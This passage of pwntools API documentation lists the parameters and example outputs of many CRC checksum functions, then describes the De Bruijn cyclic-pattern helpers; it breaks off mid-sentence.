pwnlib.util.crc.
crc_11
(data) → int[source]¶ Calculates the crc_11 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x385
- width = 11
- init = 0x1a
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.11
Parameters: data (str) – The data to checksum. Example
>>> print crc_11('123456789') 1443
-
pwnlib.util.crc.
crc_12_3gpp
(data) → int[source]¶ Calculates the crc_12_3gpp checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x80f
- width = 12
- init = 0x0
- refin = False
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.12
Parameters: data (str) – The data to checksum. Example
>>> print crc_12_3gpp('123456789') 3503
-
pwnlib.util.crc.
crc_12_cdma2000
(data) → int[source]¶ Calculates the crc_12_cdma2000 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0xf13
- width = 12
- init = 0xfff
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-12-cdma2000
Parameters: data (str) – The data to checksum. Example
>>> print crc_12_cdma2000('123456789') 3405
-
pwnlib.util.crc.
crc_12_dect
(data) → int[source]¶ Calculates the crc_12_dect checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x80f
- width = 12
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-12-dect
Parameters: data (str) – The data to checksum. Example
>>> print crc_12_dect('123456789') 3931
-
pwnlib.util.crc.
crc_13_bbc
(data) → int[source]¶ Calculates the crc_13_bbc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1cf5
- width = 13
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.13
Parameters: data (str) – The data to checksum. Example
>>> print crc_13_bbc('123456789') 1274
-
pwnlib.util.crc.
crc_14_darc
(data) → int[source]¶ Calculates the crc_14_darc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x805
- width = 14
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.14
Parameters: data (str) – The data to checksum. Example
>>> print crc_14_darc('123456789') 2093
-
pwnlib.util.crc.
crc_15
(data) → int[source]¶ Calculates the crc_15 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4599
- width = 15
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.15
Parameters: data (str) – The data to checksum. Example
>>> print crc_15('123456789') 1438
-
pwnlib.util.crc.
crc_15_mpt1327
(data) → int[source]¶ Calculates the crc_15_mpt1327 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x6815
- width = 15
- init = 0x0
- refin = False
- refout = False
- xorout = 0x1
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-15-mpt1327
Parameters: data (str) – The data to checksum. Example
>>> print crc_15_mpt1327('123456789') 9574
-
pwnlib.util.crc.
crc_16_aug_ccitt
(data) → int[source]¶ Calculates the crc_16_aug_ccitt checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0x1d0f
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-aug-ccitt
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_aug_ccitt('123456789') 58828
-
pwnlib.util.crc.
crc_16_buypass
(data) → int[source]¶ Calculates the crc_16_buypass checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x8005
- width = 16
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-buypass
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_buypass('123456789') 65256
-
pwnlib.util.crc.
crc_16_ccitt_false
(data) → int[source]¶ Calculates the crc_16_ccitt_false checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0xffff
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-ccitt-false
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_ccitt_false('123456789') 10673
-
pwnlib.util.crc.
crc_16_cdma2000
(data) → int[source]¶ Calculates the crc_16_cdma2000 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0xc867
- width = 16
- init = 0xffff
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-cdma2000
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_cdma2000('123456789') 19462
-
pwnlib.util.crc.
crc_16_dds_110
(data) → int[source]¶ Calculates the crc_16_dds_110 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x8005
- width = 16
- init = 0x800d
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-dds-110
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_dds_110('123456789') 40655
-
pwnlib.util.crc.
crc_16_dect_r
(data) → int[source]¶ Calculates the crc_16_dect_r checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x589
- width = 16
- init = 0x0
- refin = False
- refout = False
- xorout = 0x1
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-dect-r
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_dect_r('123456789') 126
-
pwnlib.util.crc.
crc_16_dect_x
(data) → int[source]¶ Calculates the crc_16_dect_x checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x589
- width = 16
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-dect-x
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_dect_x('123456789') 127
-
pwnlib.util.crc.
crc_16_dnp
(data) → int[source]¶ Calculates the crc_16_dnp checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x3d65
- width = 16
- init = 0x0
- refin = True
- refout = True
- xorout = 0xffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-dnp
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_dnp('123456789') 60034
-
pwnlib.util.crc.
crc_16_en_13757
(data) → int[source]¶ Calculates the crc_16_en_13757 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x3d65
- width = 16
- init = 0x0
- refin = False
- refout = False
- xorout = 0xffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-en-13757
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_en_13757('123456789') 49847
-
pwnlib.util.crc.
crc_16_genibus
(data) → int[source]¶ Calculates the crc_16_genibus checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0xffff
- refin = False
- refout = False
- xorout = 0xffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-genibus
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_genibus('123456789') 54862
-
pwnlib.util.crc.
crc_16_maxim
(data) → int[source]¶ Calculates the crc_16_maxim checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x8005
- width = 16
- init = 0x0
- refin = True
- refout = True
- xorout = 0xffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-maxim
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_maxim('123456789') 17602
-
pwnlib.util.crc.
crc_16_mcrf4xx
(data) → int[source]¶ Calculates the crc_16_mcrf4xx checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0xffff
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-mcrf4xx
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_mcrf4xx('123456789') 28561
-
pwnlib.util.crc.
crc_16_riello
(data) → int[source]¶ Calculates the crc_16_riello checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0xb2aa
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-riello
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_riello('123456789') 25552
-
pwnlib.util.crc.
crc_16_t10_dif
(data) → int[source]¶ Calculates the crc_16_t10_dif checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x8bb7
- width = 16
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-t10-dif
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_t10_dif('123456789') 53467
-
pwnlib.util.crc.
crc_16_teledisk
(data) → int[source]¶ Calculates the crc_16_teledisk checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0xa097
- width = 16
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-teledisk
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_teledisk('123456789') 4019
-
pwnlib.util.crc.
crc_16_tms37157
(data) → int[source]¶ Calculates the crc_16_tms37157 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0x89ec
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-tms37157
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_tms37157('123456789') 9905
-
pwnlib.util.crc.
crc_16_usb
(data) → int[source]¶ Calculates the crc_16_usb checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x8005
- width = 16
- init = 0xffff
- refin = True
- refout = True
- xorout = 0xffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-16-usb
Parameters: data (str) – The data to checksum. Example
>>> print crc_16_usb('123456789') 46280
-
pwnlib.util.crc.
crc_24
(data) → int[source]¶ Calculates the crc_24 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x864cfb
- width = 24
- init = 0xb704ce
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.24
Parameters: data (str) – The data to checksum. Example
>>> print crc_24('123456789') 2215682
-
pwnlib.util.crc.
crc_24_flexray_a
(data) → int[source]¶ Calculates the crc_24_flexray_a checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x5d6dcb
- width = 24
- init = 0xfedcba
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-24-flexray-a
Parameters: data (str) – The data to checksum. Example
>>> print crc_24_flexray_a('123456789') 7961021
-
pwnlib.util.crc.
crc_24_flexray_b
(data) → int[source]¶ Calculates the crc_24_flexray_b checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x5d6dcb
- width = 24
- init = 0xabcdef
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-24-flexray-b
Parameters: data (str) – The data to checksum. Example
>>> print crc_24_flexray_b('123456789') 2040760
-
pwnlib.util.crc.
crc_31_philips
(data) → int[source]¶ Calculates the crc_31_philips checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4c11db7
- width = 31
- init = 0x7fffffff
- refin = False
- refout = False
- xorout = 0x7fffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.31
Parameters: data (str) – The data to checksum. Example
>>> print crc_31_philips('123456789') 216654956
-
pwnlib.util.crc.
crc_32
(data) → int[source]¶ Calculates the crc_32 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4c11db7
- width = 32
- init = 0xffffffff
- refin = True
- refout = True
- xorout = 0xffffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.32
Parameters: data (str) – The data to checksum. Example
>>> print crc_32('123456789') 3421780262
-
pwnlib.util.crc.
crc_32_bzip2
(data) → int[source]¶ Calculates the crc_32_bzip2 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4c11db7
- width = 32
- init = 0xffffffff
- refin = False
- refout = False
- xorout = 0xffffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-32-bzip2
Parameters: data (str) – The data to checksum. Example
>>> print crc_32_bzip2('123456789') 4236843288
-
pwnlib.util.crc.
crc_32_mpeg_2
(data) → int[source]¶ Calculates the crc_32_mpeg_2 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4c11db7
- width = 32
- init = 0xffffffff
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-32-mpeg-2
Parameters: data (str) – The data to checksum. Example
>>> print crc_32_mpeg_2('123456789') 58124007
-
pwnlib.util.crc.
crc_32_posix
(data) → int[source]¶ Calculates the crc_32_posix checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4c11db7
- width = 32
- init = 0x0
- refin = False
- refout = False
- xorout = 0xffffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-32-posix
Parameters: data (str) – The data to checksum. Example
>>> print crc_32_posix('123456789') 1985902208
-
pwnlib.util.crc.
crc_32c
(data) → int[source]¶ Calculates the crc_32c checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1edc6f41
- width = 32
- init = 0xffffffff
- refin = True
- refout = True
- xorout = 0xffffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-32c
Parameters: data (str) – The data to checksum. Example
>>> print crc_32c('123456789') 3808858755
-
pwnlib.util.crc.
crc_32d
(data) → int[source]¶ Calculates the crc_32d checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0xa833982b
- width = 32
- init = 0xffffffff
- refin = True
- refout = True
- xorout = 0xffffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-32d
Parameters: data (str) – The data to checksum. Example
>>> print crc_32d('123456789') 2268157302
-
pwnlib.util.crc.
crc_32q
(data) → int[source]¶ Calculates the crc_32q checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x814141ab
- width = 32
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-32q
Parameters: data (str) – The data to checksum. Example
>>> print crc_32q('123456789') 806403967
-
pwnlib.util.crc.
crc_3_rohc
(data) → int[source]¶ Calculates the crc_3_rohc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x3
- width = 3
- init = 0x7
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.3
Parameters: data (str) – The data to checksum. Example
>>> print crc_3_rohc('123456789') 6
-
pwnlib.util.crc.
crc_40_gsm
(data) → int[source]¶ Calculates the crc_40_gsm checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4820009
- width = 40
- init = 0x0
- refin = False
- refout = False
- xorout = 0xffffffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.40
Parameters: data (str) – The data to checksum. Example
>>> print crc_40_gsm('123456789') 910907393606
-
pwnlib.util.crc.
crc_4_itu
(data) → int[source]¶ Calculates the crc_4_itu checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x3
- width = 4
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.4
Parameters: data (str) – The data to checksum. Example
>>> print crc_4_itu('123456789') 7
-
pwnlib.util.crc.
crc_5_epc
(data) → int[source]¶ Calculates the crc_5_epc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x9
- width = 5
- init = 0x9
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.5
Parameters: data (str) – The data to checksum. Example
>>> print crc_5_epc('123456789') 0
-
pwnlib.util.crc.
crc_5_itu
(data) → int[source]¶ Calculates the crc_5_itu checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x15
- width = 5
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-5-itu
Parameters: data (str) – The data to checksum. Example
>>> print crc_5_itu('123456789') 7
-
pwnlib.util.crc.
crc_5_usb
(data) → int[source]¶ Calculates the crc_5_usb checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x5
- width = 5
- init = 0x1f
- refin = True
- refout = True
- xorout = 0x1f
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-5-usb
Parameters: data (str) – The data to checksum. Example
>>> print crc_5_usb('123456789') 25
-
pwnlib.util.crc.
crc_64
(data) → int[source]¶ Calculates the crc_64 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x42f0e1eba9ea3693
- width = 64
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.64
Parameters: data (str) – The data to checksum. Example
>>> print crc_64('123456789') 7800480153909949255
-
pwnlib.util.crc.
crc_64_we
(data) → int[source]¶ Calculates the crc_64_we checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x42f0e1eba9ea3693
- width = 64
- init = 0xffffffffffffffff
- refin = False
- refout = False
- xorout = 0xffffffffffffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-64-we
Parameters: data (str) – The data to checksum. Example
>>> print crc_64_we('123456789') 7128171145767219210
-
pwnlib.util.crc.
crc_64_xz
(data) → int[source]¶ Calculates the crc_64_xz checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x42f0e1eba9ea3693
- width = 64
- init = 0xffffffffffffffff
- refin = True
- refout = True
- xorout = 0xffffffffffffffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-64-xz
Parameters: data (str) – The data to checksum. Example
>>> print crc_64_xz('123456789') 11051210869376104954
-
pwnlib.util.crc.
crc_6_cdma2000_a
(data) → int[source]¶ Calculates the crc_6_cdma2000_a checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x27
- width = 6
- init = 0x3f
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.6
Parameters: data (str) – The data to checksum. Example
>>> print crc_6_cdma2000_a('123456789') 13
-
pwnlib.util.crc.
crc_6_cdma2000_b
(data) → int[source]¶ Calculates the crc_6_cdma2000_b checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x7
- width = 6
- init = 0x3f
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-6-cdma2000-b
Parameters: data (str) – The data to checksum. Example
>>> print crc_6_cdma2000_b('123456789') 59
-
pwnlib.util.crc.
crc_6_darc
(data) → int[source]¶ Calculates the crc_6_darc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x19
- width = 6
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-6-darc
Parameters: data (str) – The data to checksum. Example
>>> print crc_6_darc('123456789') 38
-
pwnlib.util.crc.
crc_6_itu
(data) → int[source]¶ Calculates the crc_6_itu checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x3
- width = 6
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-6-itu
Parameters: data (str) – The data to checksum. Example
>>> print crc_6_itu('123456789') 6
-
pwnlib.util.crc.
crc_7
(data) → int[source]¶ Calculates the crc_7 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x9
- width = 7
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.7
Parameters: data (str) – The data to checksum. Example
>>> print crc_7('123456789') 117
-
pwnlib.util.crc.
crc_7_rohc
(data) → int[source]¶ Calculates the crc_7_rohc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4f
- width = 7
- init = 0x7f
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-7-rohc
Parameters: data (str) – The data to checksum. Example
>>> print crc_7_rohc('123456789') 83
-
pwnlib.util.crc.
crc_8
(data) → int[source]¶ Calculates the crc_8 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x7
- width = 8
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.8
Parameters: data (str) – The data to checksum. Example
>>> print crc_8('123456789') 244
-
pwnlib.util.crc.
crc_82_darc
(data) → int[source]¶ Calculates the crc_82_darc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x308c0111011401440411
- width = 82
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat-bits.82
Parameters: data (str) – The data to checksum. Example
>>> print crc_82_darc('123456789') 749237524598872659187218
-
pwnlib.util.crc.
crc_8_cdma2000
(data) → int[source]¶ Calculates the crc_8_cdma2000 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x9b
- width = 8
- init = 0xff
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-cdma2000
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_cdma2000('123456789') 218
-
pwnlib.util.crc.
crc_8_darc
(data) → int[source]¶ Calculates the crc_8_darc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x39
- width = 8
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-darc
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_darc('123456789') 21
-
pwnlib.util.crc.
crc_8_dvb_s2
(data) → int[source]¶ Calculates the crc_8_dvb_s2 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0xd5
- width = 8
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-dvb-s2
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_dvb_s2('123456789') 188
-
pwnlib.util.crc.
crc_8_ebu
(data) → int[source]¶ Calculates the crc_8_ebu checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1d
- width = 8
- init = 0xff
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-ebu
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_ebu('123456789') 151
-
pwnlib.util.crc.
crc_8_i_code
(data) → int[source]¶ Calculates the crc_8_i_code checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1d
- width = 8
- init = 0xfd
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-i-code
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_i_code('123456789') 126
-
pwnlib.util.crc.
crc_8_itu
(data) → int[source]¶ Calculates the crc_8_itu checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x7
- width = 8
- init = 0x0
- refin = False
- refout = False
- xorout = 0x55
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-itu
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_itu('123456789') 161
-
pwnlib.util.crc.
crc_8_maxim
(data) → int[source]¶ Calculates the crc_8_maxim checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x31
- width = 8
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-maxim
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_maxim('123456789') 161
-
pwnlib.util.crc.
crc_8_rohc
(data) → int[source]¶ Calculates the crc_8_rohc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x7
- width = 8
- init = 0xff
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-rohc
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_rohc('123456789') 208
-
pwnlib.util.crc.
crc_8_wcdma
(data) → int[source]¶ Calculates the crc_8_wcdma checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x9b
- width = 8
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-8-wdcma
Parameters: data (str) – The data to checksum. Example
>>> print crc_8_wcdma('123456789') 37
-
pwnlib.util.crc.
crc_a
(data) → int[source]¶ Calculates the crc_a checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0xc6c6
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.crc-a
Parameters: data (str) – The data to checksum. Example
>>> print crc_a('123456789') 48901
-
pwnlib.util.crc.
jamcrc
(data) → int[source]¶ Calculates the jamcrc checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x4c11db7
- width = 32
- init = 0xffffffff
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.jamcrc
Parameters: data (str) – The data to checksum. Example
>>> print jamcrc('123456789') 873187033
-
pwnlib.util.crc.
kermit
(data) → int[source]¶ Calculates the kermit checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0x0
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.kermit
Parameters: data (str) – The data to checksum. Example
>>> print kermit('123456789') 8585
-
pwnlib.util.crc.
modbus
(data) → int[source]¶ Calculates the modbus checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x8005
- width = 16
- init = 0xffff
- refin = True
- refout = True
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.modbus
Parameters: data (str) – The data to checksum. Example
>>> print modbus('123456789') 19255
-
pwnlib.util.crc.
x_25
(data) → int[source]¶ Calculates the x_25 checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0xffff
- refin = True
- refout = True
- xorout = 0xffff
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.x-25
Parameters: data (str) – The data to checksum. Example
>>> print x_25('123456789') 36974
-
pwnlib.util.crc.
xfer
(data) → int[source]¶ Calculates the xfer checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0xaf
- width = 32
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.xfer
Parameters: data (str) – The data to checksum. Example
>>> print xfer('123456789') 3171672888
-
pwnlib.util.crc.
xmodem
(data) → int[source]¶ Calculates the xmodem checksum.
This is simply the
generic_crc()
with these frozen arguments:- polynom = 0x1021
- width = 16
- init = 0x0
- refin = False
- refout = False
- xorout = 0x0
See also: http://reveng.sourceforge.net/crc-catalogue/all.htm#crc.cat.xmodem
Parameters: data (str) – The data to checksum. Example
>>> print xmodem('123456789') 12739
pwnlib.util.cyclic
— Generation of unique sequences¶
-
pwnlib.util.cyclic.
cyclic
(length = None, alphabet = string.ascii_lowercase, n = 4) → list/str[source]¶ A simple wrapper over
de_bruijn()
. This function returns a at most length elements.If the given alphabet is a string, a string is returned from this function. Otherwise a list is returned.
Parameters: - length – The desired length of the list or None if the entire sequence is desired.
- alphabet – List or string to generate the sequence over.
- n (int) – The length of subsequences that should be unique.
Example
>>> cyclic(alphabet = "ABC", n = 3) 'AAABAACABBABCACBACCBBBCBCCC' >>> cyclic(20) 'aaaabaaacaaadaaaeaaa' >>> alphabet, n = range(30), 3 >>> len(alphabet)**n, len(cyclic(alphabet = alphabet, n = n)) (27000, 27000)
-
pwnlib.util.cyclic.
cyclic_find
(subseq, alphabet = string.ascii_lowercase, n = None) → int[source]¶ Calculates the position of a substring into a De Bruijn sequence.
Parameters: - subseq – The subsequence to look for. This can either be a string, a list or an integer. If an integer is provided it will be packed as a little endian integer.
- alphabet – List or string to generate the sequence over.
- n (int) – The length of subsequences that should be unique.
Examples
>>> cyclic_find(cyclic(1000)[514:518]) 514 >>> cyclic_find(0x61616162) 4
-
pwnlib.util.cyclic.
de_bruijn
(alphabet = string.ascii_lowercase, n = 4) → generator[source]¶ Generator for a sequence of unique substrings of length n. This is implemented using a De Bruijn Sequence over the given alphabet.
The returned generator will yield up to
len(alphabet)**n
